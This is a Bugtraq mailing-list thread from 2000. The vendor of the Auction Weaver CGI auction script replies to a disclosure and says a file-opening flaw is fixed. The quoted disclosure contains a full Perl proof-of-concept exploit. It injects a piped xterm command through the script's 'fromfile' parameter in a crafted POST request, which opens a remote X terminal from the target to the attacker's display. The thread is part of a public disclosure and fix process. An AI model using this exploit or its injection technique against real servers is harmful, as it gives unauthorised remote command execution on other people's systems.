[16532] in bugtraq
Re: More problems with Auction Weaver & CGI Script Center.
daemon@ATHENA.MIT.EDU (CGI Script Center Support)
Mon Sep 4 00:06:38 2000
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-ID: <000701c01538$5ee212c0$2a9f0a18@msnv1.occa.home.com>
Date: Sat, 2 Sep 2000 16:49:02 -0700
Reply-To: support@cgiscriptcenter.com
From: CGI Script Center Support <support@cgiscriptcenter.com>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <000d01c012d5$a2f568a0$0cb1b3d0@Jennifer>
Auction Weaver Lite 1.02 was opening files to be read without using the READ
"<" command, which allowed outside commands to be executed on UNIX platforms
using Xterm.
All files being opened for reading have now been updated.
> I have only been able to check the below exploit on the shareware
> version, but I strongly believe that the PRO version is exploitable
> as well.
No Professional version is yet available.
The below exploit should no longer be valid.
CGI Script Center Support
support@cgiscriptcenter.com
> -----Original Message-----
> From: teleh0r - [mailto:teleh0r@doglover.com]
> Sent: Wednesday, August 30, 2000 10:21 AM
> To: BUGTRAQ@SECURITYFOCUS.COM
> Cc: support@cgiscriptcenter.com
> Subject: More problems with Auction Weaver & CGI Script Center.
>
>
> CGI Script Center recently upgraded Auction Weaver 1.0 to
> 1.2 due to a security issue found and reported by Meliksah Ozoral.
>
> Today, I decided to take a look at Auction Weaver just to check
> if the issue and possible other security problems were now fixed.
>
> I guessed they had taken a *close* look at their scripts, considering
> the problems reported lately - but I guessed wrong...
>
> I have only been able to check the below exploit on the shareware
> version, but I strongly believe that the PRO version is exploitable
> as well.
>
> Or perhaps only those who pays gets secure scripts? Maybe that would
> be a successful business policy? ;)
>
> CGI Script Center, _please_ contact me if you want help securing your
> scripts.
>
> Sincerely yours,
> teleh0r
>
> 8<---auctionweaver-exploit.pl------------------------------------
>
>
> #!/usr/bin/perl -w
>
> ## Auction Weaver 1.02 / Only confirmed with LITE
> ## - Proof of Concept exploit -
> ##
> ## CGI Script Center have just released an update
> ## of Auction Weaver due to security reasons - I
> ## suggest that you spend some more time securing
> ## it, and the other scripts - It is really needed.
> ##
> ## This exploit will spawn a xterm from $target
> ## to $attacker.
> ##
> ## This exploit will not work on hosts running
> ## Auction Weaver on NT, due to the xterm call.
> ##
> ## CGI Script Center, please contact me if you need
> ## help with securing your scripts...
> ##
> ## teleh0r@doglover.com / anno 2000
> ## http://teleh0r.cjb.net
>
> use strict; use Socket;
>
> if (@ARGV < 3) {
> print("Usage: $0 <target> <attacker> <dpy>\n");
> exit(1);
> }
>
> my($target,$attacker,$dpy,$length,$cgicode,
> $agent,$sploit,$iaddr,$paddr,$proto);
>
> ($target,$attacker,$dpy) = @ARGV;
>
> if ($dpy !~ /\d/) {
> print("dpy must be a number, probably 0\n");
> exit(1);
> }
>
> print("\nRemote host: $target\n");
> print("CGI-script: /cgi-bin/awl/auctionweaver.pl\n");
> print("Command: xterm -ut -display $attacker:$dpy\n\n");
>
> system("xhost + $target");
>
> $length = 138 + length($attacker.$dpy);
>
> $cgicode =
> "flag1=1&fromfile=%7Cxterm+-display+$attacker%3A$dpy%7C&placebid=1
> &catdir".
> "=cat1&username=teleh0r&password=ohbaby&bid=Ihavenomoney&nobiditem
> =1&sbut".
> "ton=BID";
>
> $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";
>
> # The path to auctionweaver.pl may of course need to be changed.
>
> $sploit=
> "POST /cgi-bin/awl/auctionweaver.pl HTTP/1.0
> Connection: close
> User-Agent: $agent
> Host: $target
> Content-type: application/x-www-form-urlencoded
> Content-length: $length
>
> $cgicode";
>
> $iaddr = inet_aton($target) || die("Error: $!\n");
> $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
> $proto = getprotobyname('tcp') || die("Error: $!\n");
>
> socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
> connect(SOCKET, $paddr) || die("Error: $!\n");
> send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n");
> close(SOCKET);
>
> sleep(3);
> system("xhost - $target");
> print("\nAll done - hopefully you got the flying xterm!\n");
> exit(0)
>
>
> -----------------------------------------------------------------
>
>
> ______________________________________________
> FREE Personalized Email at Mail.com
> Sign up at http://www.mail.com/?sr=signup
>
>
